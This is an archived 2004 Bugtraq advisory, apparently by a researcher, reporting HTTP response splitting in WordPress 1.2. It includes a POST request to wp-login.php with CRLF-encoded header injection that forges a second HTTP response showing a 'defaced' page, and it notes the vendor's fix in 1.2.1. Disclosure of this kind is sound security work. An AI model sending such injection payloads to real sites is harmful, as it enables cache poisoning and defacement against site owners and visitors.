lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Wed, 6 Oct 2004 18:41:02 -0500 From: "Chaotic Evil" <chaoticevil@...ring.com> To: <bugtraq@...urityfocus.com> Subject: HTTP Response Splitting Vulnerability in Wordpress 1.2 SECURITY ADVISORY: HTTP Response Splitting in WordPress 1.2 AUTHOR: Chaotic Evil (chaoticevil $$$at$$$ spyring $$$dot$$$ com) DATE: October 6th, 2004 PRODUCT: WordPress 1.2 (wordpress.org) FROM THE VENDOR WEBSITE: WordPress is a state-of-the-art semantic personal publishing platform with a focus on aesthetics, web standards, and usability. What a mouthful. WordPress is both free and priceless at the same time. WordPress was born out of a desire for an elegant, well- architectured personal publishing system built on PHP and MySQL and licensed under the GPL. SECURITY VULNERABILITY HTTP Response Splitting [1]. EXPLOIT: HOSTNAME, USER and PASS should be replaced with the relevant values (and Content-Length needs to be adjusted accordingly). Replace curly braces with less-than and greater-than signs. Code is line wrapped. POST /wp-login.php HTTP/1.0 Host: HOSTNAME Content-Type: application/x-www-form-urlencoded Content-length: 226 action=login&mode=profile&log=USER&pwd=PASS&text= %0d%0aConnection:%20Keep-Alive%0d%0aContent-Length:%20 0%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Length: %2021%0d%0aContent-Type:%20text/html%0d%0a%0d%0a{html} *defaced*{/html} VENDOR STATUS: Vendor contacted September 24th. Vendor worked closely with the author and promptly produced a fix (see below). FIX: Use WordPress 1.2.1. See vendor site: http://wordpress.org/development/2004/10/wp-121/ REFERENCES: [1] "'Divide and Conquer' - HTTP Response SPlitting, Web Cache Poisoning attacks, and Related Topics" by Amit Klein, dated March 4th, 2004 http://www.packetstormsecurity.org/papers/general/whitepaper_httpresponse.pd f _____________________________________________ Free email with personality! Over 200 domains! http://www.MyOwnEmail.com
Powered by blists - more mailing lists